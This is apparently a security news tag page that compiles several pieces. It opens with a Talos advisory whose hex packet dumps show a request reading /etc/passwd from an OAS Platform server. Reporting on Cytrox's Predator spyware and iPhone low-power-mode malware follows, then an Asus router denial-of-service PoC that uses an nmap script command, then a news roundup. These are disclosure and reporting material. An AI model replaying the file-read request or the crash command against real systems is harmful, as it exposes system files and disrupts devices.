An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to read an arbitrary file at any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 ff 00 00 40 00 40 06 a4 06 c0 a8 0a 6a c0 a8   ....@.@......j..
    0020   0a 38 c4 e4 e5 67 c9 f5 cd 34 94 6c 24 2e 80 18   .8...g...4.l$...
    0030   08 0a 21 f0 00 00 01 01 08 0a bb 15 e8 9d d6 18   ..!.............
    0040   2b 37 00 00 00 00 00 60 68 40 00 01 00 00 00 ff   +7.....`h@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 03 00 00 00 08 08 02 00   ................
    00f0   00 00 06 08 00 00 00 03 6f 75 74 06 09 00 00 00   ........out.....
    0100   0b 2f 65 74 63 2f 70 61 73 73 77 64 0b            ./etc/passwd.
    

Once the required Security Group and User Account have been created, a file of choice can be read from the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. When a SecureTransferFiles command is successfully processed, the response will contain the contents of the requested file. This response resembles the following:

    0000   c4 b3 01 c3 ba c9 00 0c 29 5e b3 62 08 00 45 00   ........)^.b..E.
    0010   0a de 3b ca 40 00 40 06 5e 5d c0 a8 0a 38 c0 a8   ..;.@.@.^]...8..
    0020   0a 6a e5 67 c4 e4 94 6c 24 2e c9 f5 cd ff 80 18   .j.g...l$.......
    0030   01 fc a0 c3 00 00 01 01 08 0a d6 18 2b 3c bb 15   ............+<..
    0040   e8 9d 00 00 00 00 00 44 a5 40 00 01 00 00 00 ff   .......D.@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   02 00 00 00 06 02 00 00 00 07 53 75 63 63 65 73   ..........Succes
    0070   73 09 03 00 00 00 10 03 00 00 00 01 00 00 00 09   s...............
    0080   04 00 00 00 10 04 00 00 00 03 00 00 00 08 08 01   ................
    0090   00 00 00 06 05 00 00 00 0b 2f 65 74 63 2f 70 61   ........./etc/pa
    00a0   73 73 77 64 09 06 00 00 00 0f 06 00 00 00 38 0a   sswd..........8.
    00b0   00 00 02 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f   ...root:x:0:0:ro
    00c0   6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61   ot:/root:/bin/ba
    00d0   73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a   sh.daemon:x:1:1:
    00e0   64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e   daemon:/usr/sbin
    00f0   3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67   :/usr/sbin/nolog
    0100   69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e   in.bin:x:2:2:bin
    

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26067: TALOS-2022-1492 || Cisco Talos Intelligence Group

A spyware vendor called Cytrox was found to be using several zero-day vulnerabilities in Google's Chrome browser and the Android kernel component. 
The post Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware appeared first on Malwarebytes Labs.

The Google Threat Analysis Group (TAG) has revealed that of the nine zero-day vulnerabilities affecting Chrome, Android, Apple and Microsoft that it reported in 2021, five were in use by a single commercial surveillance company.

Did I hear someone say Pegasus? An educated guess, but wrong in this case. The name of the surveillance company—or better said, professional spyware vendor—is Cytrox and the name of its spyware is Predator.

**Google**

TAG routinely hunts for zero-day vulnerabilities exploited in-the-wild to fix the vulnerabilities in Google’s own products. If the group finds zero-days outside of its own products, it reports them to the vendors that own the vulnerable software.

Patches for the five vulnerabilities TAG mentions in its blog are available. Four of them affected the Chrome browser and one the Android kernel component.

**Vulnerabilities**

By definition, zero-day vulnerabilities are vulnerabilities for which no patch exists, and therefore potentially have a high rate of success for an attacker. That doesn’t mean that patched vulnerabilities are useless to attackers, but they will have a smaller number of potential targets. Depending on the product and how easy it is to apply patches, vulnerabilities can be useful for quite a while.

In the campaign uncovered by TAG, the spyware vendor used the zero-days in conjunction with other already-patched vulnerabilities. The developers took advantage of the time difference between the availability of patches for some of the critical bugs, as it can take a while before these patches are fully deployed across the Android ecosystem.

TAG says Cytrox abused four Chrome zero-days (CVE-2021-37973, CVE-2021-37976, CVE-2021-38000, and CVE-2021-38003) and a single Android zero-day (CVE-2021-1048) last year in at least three campaigns conducted on behalf of various governments.

**Cytrox**

TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors. Cytrox is one of these vendors, along with the NSO Group—undoubtedly the best known one among them and responsible for Pegasus spyware.

Citizenlab at the University of Toronto published information about Cytrox in December 2021. It says that Cytrox describes its own activities as providing governments with an “operational cyber solution” that includes gathering information from devices and cloud services. It also says it assists with “designing, managing, and implementing cyber intelligence gathering in the network, enabling businesses to gather intelligence from both end devices as well as from cloud services.”

Cytrox reportedly began life as a North Macedonian start-up and appears to have a corporate presence in Israel and Hungary. As such, Cytrox is believed to be part of the so-called Intellexa alliance, a marketing label for a range of mercenary surveillance vendors that emerged in 2019. The consortium of companies includes Nexa Technologies (formerly Amesys), WiSpear/Passitora Ltd., Cytrox, and Senpai, along with other unnamed entities, purportedly seeking to compete against other players in the cyber surveillance market such as NSO Group (Pegasus) and Verint.

**Government spyware**

Spyware packages such as Predator and Pegasus create problematic circumstances for the security teams at Google, Apple, and Microsoft, and it seems like they will not stop any time soon.

Whatever arguments these vendors use about how they are working for governments, and therefore not doing anything illegal, we all know the legitimacy of some governments lies in the eye of the beholder. And it is not always easy to find out who actually controls the data received from the spyware.

It is for good reason that the European Data Protection Supervisor (EDPS) has urged the EU to ban the development and deployment of spyware with the capabilities of Pegasus to protect fundamental rights and freedoms. The EDPS argues that the use of Pegasus might lead to an unprecedented level of intrusiveness, threatening the very essence of the right to privacy, since the spyware is capable of interfering with the most intimate aspects of our daily lives.

Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware

By Deeba Ahmed
Spyware developer firm Cytrox is under Google’s radar for developing exploits against five 0-day flaws in Android and…
This is a post from HackRead.com Read the original post: Predator Spyware Using Zero-day to Target Android Devices

Spyware developer firm Cytrox is under Google’s radar for developing exploits against five 0-day flaws in Android and Chrome.

On Thursday, May 19th, Google’s Threat Analysis Group (TAG) reported that spyware developer/vendor Cytrox had developed exploits against five zero-day vulnerabilities to target Android users with spyware.

According to the details shared by TAG, threat actors are using the infamous Predator spyware in three different campaigns. Predator was previously analyzed in a report from the University of Toronto’s Citizen Lab.

**0-days used with n-days to Deploy Spyware**

The exploits are developed for four Chrome 0-days and one Android 0-day flaw. In their blog post, TAG researchers Clement Lecigne and Christian Resell explained that the 0-days are used in conjunction with n-day exploits.

Moreover, the attackers are trying to benefit from the time difference between the patching of some critical bugs, which weren’t declared severe security issues, and “when these patches were fully deployed across the Android ecosystem.”

**Spyware Details**

According to Google, the North Macedonian-based commercial surveillance firm Cytrox has packaged and sold the exploits to different state-backed threat actors in Greece, Egypt, Serbia, Madagascar, Indonesia, Spain, Côte d’Ivoire, and Armenia.

It is alleged that the buyers have used these bugs in at least three campaigns so far. The Predator spyware is similar to NSO Group’s Pegasus spyware, allowing threat actors to penetrate Android and iOS devices.

**About the Three Campaigns using Predator**

TAG examined three campaigns and concluded that attackers send one-time URLs to Android users through spear-phishing emails. These links are shortened using a common use URL shortener while the attackers target only a handful of victims. When users click on this malicious URL, they are redirected to a malicious webpage that automatically deploys the exploits and redirects them to a legitimate website.

Once there, the attackers deploy Alien Android malware that loads Cytrox’s Predator. In case the shortened link doesn’t work, the victim is directly taken to the legit website.

**List of Exploits**

Here’s the list of the 0-day flaws exploited by attackers in Chrome and Android:

*   CVE-2021-1048
*   CVE-2021-37973
*   CVE-2021-37976
*   CVE-2021-38000
*   CVE-2021-38003

The primary aim of attackers behind this operation is distributing Alien malware that is a precursor for deploying Predator spyware onto infected devices. It receives commands from Predator through an IPC (inter-process communication) mechanism and can record audio, hide apps, and add CA certificates to evade detection.

The first campaign was launched in August last year on Google Chrome, targeting the Samsung Galaxy S21 device. One month later, the second campaign targeted an updated Samsung Galaxy S10, while the third was detected in October 2021.

**More Android Spyware News**

1.  Fake Android Banking Apps Stealing Credentials Via Malware
2.  BRATA Android malware factory resets phones after stealing funds
3.  TangleBot Android malware hijacks phone to steal login credentials
4.  New Android malware TeaBot found stealing data, intercepting SMS
5.  New Russian Android Malware Tracks GPS Location and Spies on Victims

Predator Spyware Using Zero-day to Target Android Devices

Google's Threat Analysis Group (TAG) on Thursday pointed fingers at a North Macedonian spyware developer named Cytrox for developing exploits against five zero-day (aka 0-day) flaws, four in Chrome and one in Android, to target Android users.
"The 0-day exploits were used alongside n-day exploits as the developers took advantage of the time difference between when some critical bugs were patched

Google's Threat Analysis Group (TAG) on Thursday pointed fingers at a North Macedonian spyware developer named Cytrox for developing exploits against five zero-day (aka 0-day) flaws, four in Chrome and one in Android, to target Android users.

"The 0-day exploits were used alongside n-day exploits as the developers took advantage of the time difference between when some critical bugs were patched but not flagged as security issues and when these patches were fully deployed across the Android ecosystem," TAG researchers Clement Lecigne and Christian Resell said.

Cytrox is alleged to have packaged the exploits and sold them to different government-backed actors located in Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain, and Indonesia, who, in turn, weaponized the bugs in at least three different campaigns.

The commercial surveillance company is the maker of Predator, an implant analogous to that of NSO Group's Pegasus, and is known to have developed tools that enables its clients to penetrate iOS and Android devices.

In December 2021, Meta Platforms (formerly Facebook) disclosed that it had acted to remove roughly 300 accounts on Facebook and Instagram that the company used as part of its compromise campaigns.

The list of the five exploited zero-day flaws in Chrome and Android is below -

*   **CVE-2021-37973** - Use-after-free in Portals API
*   **CVE-2021-37976** - Information leak in core
*   **CVE-2021-38000** - Insufficient validation of untrusted input in Intents (root cause analysis)
*   **CVE-2021-38003** - Inappropriate implementation in V8, and
*   **CVE-2021-1048** - Use-after-free in Android kernel (root cause analysis)

According to TAG, all the three campaigns in question commenced with a spear-phishing email that contained one-time links mimicking URL shortener services that, once clicked, redirected the targets to a rogue domain that dropped the exploits before taking the victim to a legitimate site.

"The campaigns were limited — in each case, we assess the number of targets was in the tens of users," Lecigne and Resell noted. "If the link was not active, the user was redirected directly to a legitimate website."

The ultimate goal of the operation, the researchers assessed, was to distribute a malware dubbed Alien, which acts as a precursor for loading Predator onto infected Android devices.

The "simple" malware, which receives commands from Predator over an inter process communication (IPC) mechanism, is engineered to record audio, add CA certificates, and hide apps to evade detection.

The first of the three campaigns took place in August 2021. It used Google Chrome as a jumping off point on a Samsung Galaxy S21 device to force the browser to load another URL in the Samsung Internet browser without requiring user interaction by exploiting CVE-2021-38000.

Another intrusion, which occurred a month later and was delivered to an up-to-date Samsung Galaxy S10, involved an exploit chain using CVE-2021-37973 and CVE-2021-37976 to escape the Chrome sandbox (not to be confused with Privacy Sandbox), leveraging it to drop a second exploit to escalate privileges and deploy the backdoor.

The third campaign — a full Android 0-day exploit — was detected in October 2021 on an up-to-date Samsung phone running the then latest version of Chrome. It strung together two flaws, CVE-2021-38003 and CVE-2021-1048, to escape the sandbox and compromise the system by injecting malicious code into privileged processes.

Google TAG pointed out that while CVE-2021-1048 was fixed in the Linux kernel in September 2020, it wasn't backported to Android until last year as the fix was not marked as a security issue.

"Attackers are actively looking for and profiting from such slowly-fixed vulnerabilities," the researchers said.

"Tackling the harmful practices of the commercial surveillance industry will require a robust, comprehensive approach that includes cooperation among threat intelligence teams, network defenders, academic researchers and technology platforms."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Cytrox's Predator Spyware Target Android Users with Zero-Day Exploits

New research from Google's Threat Analysis Group outlines the risks Android users face from the surveillance-for-hire industry.

NSO Group and its powerful Pegasus malware have dominated the debate over commercial spyware vendors who sell their hacking tools to governments, but researchers and tech companies are increasingly sounding the alarm about activity in the wider surveillance-for-hire industry. As part of this effort, Google's Threat Analysis Group is publishing details on Thursday of three campaigns that used the popular Predator spyware, developed by the North Macedonian firm Cytrox, to target Android users.

In line with findings on Cytrox published in December by researchers at University of Toronto’s Citizen Lab, TAG saw evidence that state-sponsored actors who bought the Android exploits were located in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia. And there may have been other customers. The hacking tools took advantage of five previously unknown Android vulnerabilities, as well as known flaws that had fixes available but that victims hadn’t patched.

“It's important to shine some light on the surveillance vendor ecosystem and how these exploits are being sold,” says Google TAG director Shane Huntley. “We want to reduce the ability of both the vendors and the governments and other actors who buy their products to throw around these dangerous zero-days without any cost. If there’s no regulation and no downside to using these capabilities, then you’ll see it more and more.”

The commercial spyware industry has given governments that don’t have the funds or expertise to develop their own hacking tools access to an expansive array of products and surveillance services. This allows repressive regimes and law enforcement more broadly to acquire tools that enable them to surveil dissidents, human rights activists, journalists, political opponents, and regular citizens. And while a lot of attention has been focused on spyware that targets Apple’s iOS, Android is the dominant operating system worldwide and has been facing similar exploitation attempts.

 “We just want to protect users and find this activity as quickly as possible,” Huntley says. “We don’t think we can find everything all the time, but we can slow these actors down.”

TAG says it currently tracks more than 30 surveillance-for-hire vendors that have ranging levels of public presence and offer an array of exploits and surveillance tools. In the three Predator campaigns TAG examined, attackers sent Android users one-time links over email that looked like they had been shortened with a standard URL shortener. The attacks were targeted, focusing on just a few dozen potential victims. If a target clicked on the malicious link, it took them to a malicious page that automatically began deploying the exploits before quickly redirecting them to a legitimate website. On that malicious page, attackers deployed “Alien,” Android malware designed to load Cytrox's full spyware tool, Predator.

As is the case with iOS, such attacks on Android require exploiting a series of operating system vulnerabilities in sequence. By deploying fixes, operating system makers can break these attack chains, sending spyware vendors back to the drawing board to develop new or modified exploits. But while this makes it more difficult for attackers, the commercial spyware industry has still been able to flourish.

“We can’t lose sight of the fact that NSO Group or any one of these vendors is just one piece of a broader ecosystem,” says John Scott-Railton, a senior researcher at Citizen Lab. “We need collaboration between platforms so that enforcement actions and mitigations cover the full scope of what these commercial players are doing and make it harder for them to continue.”

Spyware Vendors Target Android With Zero-Day Exploits

Researchers found a way to exploit the tech that enables Apple’s Find My feature, which could allow attackers to track location when a device is powered down.

When you turn off an iPhone, it doesn’t fully power down. Chips inside the device continue to run in a low-power mode that makes it possible to locate lost or stolen devices using the Find My feature or use credit cards and car keys after the battery dies. Now researchers have devised a way to abuse this always-on mechanism to run malware that remains active even when an iPhone appears to be powered down.

It turns out that the iPhone’s Bluetooth chip—which is key to making features like Find My work—has no mechanism for digitally signing or even encrypting the firmware it runs. Academics at Germany’s Technical University of Darmstadt figured out how to exploit this lack of hardening to run malicious firmware that allows the attacker to track the phone’s location or run new features when the device is turned off.

This video provides a high overview of some of the ways an attack can work.

The research is the first—or at least among the first—to study the risk posed by chips running in low-power mode. Not to be confused with iOS’s low-power mode for conserving battery life, the low-power mode (LPM) in this research allows chips responsible for near-field communication, ultra wideband, and Bluetooth to run in a special mode that can remain on for 24 hours after a device is turned off.

“The current LPM implementation on Apple iPhones is opaque and adds new threats,” the researchers wrote in a paper published last week. “Since LPM support is based on the iPhone’s hardware, it cannot be removed with system updates. Thus, it has a long-lasting effect on the overall iOS security model. To the best of our knowledge, we are the first who looked into undocumented LPM features introduced in iOS 15 and uncover various issues.”

They added: “Design of LPM features seems to be mostly driven by functionality, without considering threats outside of the intended applications. Find My after power off turns shutdown iPhones into tracking devices by design, and the implementation within the Bluetooth firmware is not secured against manipulation.”

The findings have limited real-world value, since infections required first jailbreaking an iPhone, which in itself is a difficult task, particularly in an adversarial setting. Still, targeting the always-on feature in iOS could prove handy in post-exploit scenarios by malware such as Pegasus, the sophisticated smartphone exploit tool from Israel-based NSO Group, which governments worldwide routinely employ to spy on adversaries.

It may also be possible to infect the chips in the event hackers discover security flaws that are susceptible to over-the-air exploits similar to this one that worked against Android devices.

Besides allowing malware to run while the iPhone is turned off, exploits targeting LPM could also allow malware to operate with much more stealth since LPM allows firmware to conserve battery power. And, of course, firmware infections are extremely difficult to detect since it requires significant expertise and expensive equipment.

The researchers said Apple engineers reviewed their paper before it was published, but company representatives never provided any feedback on its contents. Apple representatives didn’t respond to an email seeking comment for this story.

Ultimately, Find My and other features enabled by LPM help provide added security, because they allow users to locate lost or stolen devices and lock or unlock car doors even when batteries are depleted. But the research exposes a double-edged sword that, until now, has gone largely unnoticed.

“Hardware and software attacks similar to the ones described have been proven practical in a real-world setting, so the topics covered in this paper are timely and practical,” said John Loucaides, senior vice president of strategy at firmware security firm Eclypsium. “This is typical for every device. Manufacturers are adding features all the time, and with every new feature comes a new attack surface.”

_This story originally appeared on_ _Ars Technica__._

Your iPhone Is Vulnerable to a Malware Attack Even When It’s Off

By Deeba Ahmed
The iOS Find My feature has a safety loophole that can lead to infecting the iPhone even if…
This is a post from HackRead.com Read the original post: Attackers can Install Malware on iPhone When it is Powered Off – Research

The iOS Find My feature has a safety loophole that can lead to infecting the iPhone even if the phone is off.

Academic researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt have identified a unique way of infecting an iPhone by loading malware while the phone is off.

Researchers will present their findings at the ACM Conference on Security and Privacy in Wireless Mobile Networks/ WiseSec 2022.

**How does the Attack work?**

The attack occurs after tampering with the iOS firmware and loading the malicious software onto a wireless Bluetooth chip with Near-field Communication and Ultra-Wideband. The attacker needs to execute the chip to infect the phone when it is off. The chip continues to operate when the system is off, and the Low Power Mode (LPM) is activated.

While the three wireless chips can facilitate Find My and Express Card transaction features, these can directly access the secure element. Basically, the ultra-wideband (UWB) (supported by iPhone 11, 12, and 13) and the Bluetooth chips are hardwired to the NFC chip’s Secure Element and can easily access confidential data.

“Since LPM support is implemented in hardware, it cannot be removed by changing software components. As a result, on modern iPhones, wireless chips can no longer be trusted to be turned off after shutdown,” researchers wrote in the paper titled “Evil Never Sleeps: When Wireless Malware Stays On After Turning Off iPhones.”

Researchers regarded the LPM feature as Opaque and highlighted that it sometimes fails to initialize Find My ads when the phone is off. Moreover, the Bluetooth firmware is not encrypted or signed.

An attacker can exploit this flaw to execute the malware on an iPhone Bluetooth chip. However, the adversary must possess privileged access. Furthermore, the attacker must communicate to the firmware via the OS, modify its image or obtain code execution on an LPM-activated chip by exploiting another flaw such as BrakTooth to exploit the loophole successfully.

**What is LPM?**

This feature was introduced in 2021 with iOS 15. It helps the user track lost devices using the Find My network and stays available even when the phone is out of battery power or is off. Before the phone shuts down, a message states the device will remain findable despite being off, and the Find My feature will locate it in case it is lost or stolen. The phone will be accessible when powered off or is in power reserve mode.

**More iPhone Tech & Hack on Hackread.com**

1.  A bug lets you crash anyone’s iPhone with a text message
2.  SolarWinds hackers exploited iOS 0-day to compromise iPhones
3.  Apple’s neuralMatch tool will scan iPhones for child abuse content
4.  iPhones of 9 State Dept officials hijacked by NSO Pegasus spyware
5.  NSO zero-click iMessage exploit hacks iPhone without the need to click links

Attackers can Install Malware on iPhone When it is Powered Off – Research

Asus DSL-N14U-B1 1.1.2.3_805 allows remote attackers to cause a Denial of Service (DoS) via a TCP SYN scan using nmap.

CVE-2021-3254

layout

title

date

comments

categories

post

Persistent crash of services after TCP SYN scan

2021-01-22

true

vulnerability

**Affected products**

We have not yet tested Asus models other than those listed. However we suspect it may also work on other models with the same firmware version.

        DSL-N14U_B1 V.1.1.2.3_805
        
    

**Overview**

An issue was discovered on ASUS DSL-N14U-B1 1.1.2.3\_805 device. Remote attacker to cause a denial of service (crash) by performing a SYN scan using a tool such as nmap. Sending these packets causes a persistent outage of the jetdirect (9100/tcp), LPD (515/tcp) and sos (3838/udp) services.

**POC**

**This PoC can crash services.**

##Stage 1: Enumeration

##Stage 2: Upload test

We enter the router via ssh to understand through the proc file system what's going on.

As shown in the figure, we can see some active services and their port in hexadecimal format. Those that interest us are basically jetdirect LPD (i.e. 238C and 0203 in hex)

##Stage 3: Showdown

We run nmap by inserting an additional script with a moderate degree of intrusion.

The script retrieves or sets the "ready message" on devices that support the Printer Job Language.

sudo nmap -sV --script pjl-ready-message

Once this is done, we immediately notice differences in the proc file system.

As a counter check, we show the status of services before and after running nmap via netstat -tulen (busybox doesn't support -p, which is why we work on the proc file system inside the router).

In the latest two figures we show proc file system effects in a comprehensive way 

If we had an eye previously, we have seen well, not just two ocurrencies related to printing services crashed... an additional service disappeared: sos service (3838 / tcp) - Scito Object Server

The situation will persist as long as the modem router is active. The services will be active again only with a physical intervention (reboot)

CVE-2021-3254: kaisersource.github.io/2021-01-22-dsl-n14u.md at main · kaisersource/kaisersource.github.io

Plus: Russia rerouted internet in occupied Ukraine, Grindr sold its users' location data to ad networks, and more.

If the war in Ukraine and Russia's still-unfolding atrocities there didn't offer enough fodder for doomscrolling, this week supplied a new dose of domestic crisis: A leaked Supreme Court draft decision that would overturn _Roe v. Wade_, demolishing a ruling that has served as a cornerstone of reproductive rights for nearly five decades. And this crisis, too, will play out in the digital realm as much as the physical and legal ones.

WIRED's Lily Hay Newman responded to the news with a guide to protecting your privacy if you're seeking an abortion in a near-future world in which _Roe_ has in fact been overturned. As right-wing pundits demand the Supreme Court leaker's prosecution, meanwhile, we analyzed the laws concerning leaks of unclassified government information like a draft court ruling and found that there's no clear statute criminalizing that sort of information sharing. And law professor Amy Gajda walked us through the history of Supreme Court information leaks, which stretches back hundreds of years.

As Russia's war in Ukraine grinds on, we looked at how small, consumer-grade drones are offering a defensive tool to Ukrainians that they're exploiting as in no other war in history. And further abroad in India, a battle is taking shape between VPN firms and the Indian government, which is demanding they hand over users' data. Meanwhile, the country's new “super app,” Tata Neu, has sparked user privacy concerns.

And there's more. As we do every week, we’ve rounded up all the news that we didn’t break or cover in-depth. Click on the headlines to read the full stories. And stay safe out there.

If _Roe_'s precedent ceases to protect people seeking abortions across the United States, the question of who can digitally surveil those seeking abortions and abortion providers—and how to evade that surveillance—will become a civil liberties battle of the highest urgency. This week, Motherboard's Joseph Cox fired the opening salvos of that battle with a series of stories about data brokers who offer to sell location data that include individuals' visits to abortion clinics and Planned Parenthood offices, an egregious form of surveillance capitalism with immediate human consequences. Anti-abortion protest groups have already used abortion clinic data to target ads at women inside the clinics, and the same data could soon be used to identify women who seek out-of-state abortions in violation of local laws.

Cox pointed to two companies, SafeGraph and Placer.ai, both of which sold location data of those apparently visiting abortion clinics. Placer.ai has gone so far as to offer "heat maps" of where abortion clinic visitors live to anyone who creates a free account on its site. Cox's reporting had quick results: SafeGraph, which was banned from the Google Play store in June, responded to Motherboard's story by committing to stop selling the abortion-related location data. One of its investors, Are Traasdahl, says he's selling his stake in the company and donating the money to Planned Parenthood.

Your move, Placer.ai.

While we're shaming firms that leak or sell their users' location data, Grindr has long represented a uniquely dangerous combination: a company that courts at-risk users, and then egregiously fails to protect their privacy. This week, _The Wall Street Journal_ revealed that Grindr users' location data was sold for years—beginning in 2017 until at least two years ago—via ad networks, potentially exposing the movements, work locations, and home addresses of millions of gay men. The revelation follows years of Grindr data abuses and inattention to privacy and security, such as allowing anyone to pinpoint users with a triangulation technique, and even turning a blind eye as one man's life was ruined by spoofed Grindr accounts.

In 2022 a Russian military occupation doesn't merely mean physical devastation from shelling, unspeakable war crimes, and mass deportations of Ukrainian civilians to Russian hinterlands. In the Russian-occupied region of Kherson in southern Ukraine, it now means that Ukrainians have been disconnected from the global internet and rerouted through Russia's tightly controlled, surveilled, and censored “Runet.” The move, confirmed Monday by the internet monitoring firm Netblocks, represents a grim advancement of the “splinternet” notion of repressive regimes increasingly walling off their own regional slice of the internet to exert greater control over their populations. Russia now appears to be experimenting with extending its internet repression to the victims of its unprovoked military conquests in a bid to better control and influence digital information there too.

Last month, _The New Yorker_ published an in-depth investigation of how the Israeli hacking firm NSO Group's highly sophisticated smartphone spyware known as Pegasus was used to target members of Spain's Catalan independence movement. Now, Spain's government may be getting a taste of its own medicine: Both the prime minister, Pedro Sánchez, and the country's defense minister, Margarita Robles, have said that their phones, too, were hacked with Pegasus in May and June of 2021. Spain's criminal court is investigating the hacking, which was revealed by security researchers at Citizen Lab. While the Spanish government has claimed that the hacking must have been carried out by a foreign culprit, the Catalan targets of Pegasus have long pointed the finger—for their own targeting at least—at Spain's National Intelligence Center.

The US Treasury announced Friday that it's issuing sanctions against Blender.io, a “mixing” service that's used to obscure the origins and destinations of cryptocurrency. Mixers, including Bitcoin Fog and Helix, have been criminally prosecuted by the US Department of Justice for helping to obscure the criminal origins of cryptocurrency. But the sanctions against Blender.io represent the first time that the Treasury has taken measures to financially ostracize a mixer, making it a crime for any American to transact with the service. In this case, Blender is accused of helping to launder $20.5 million of the $620 million worth of cryptocurrency that North Korea's Lazarus hackers allegedly stole from the cryptocurrency firm Ronin Networks in March. That hack alone suggests that North Korean thieves have already topped the estimated $400 million in crypto—largely in the Ethereum currency—that they stole last year.

Tag

#asus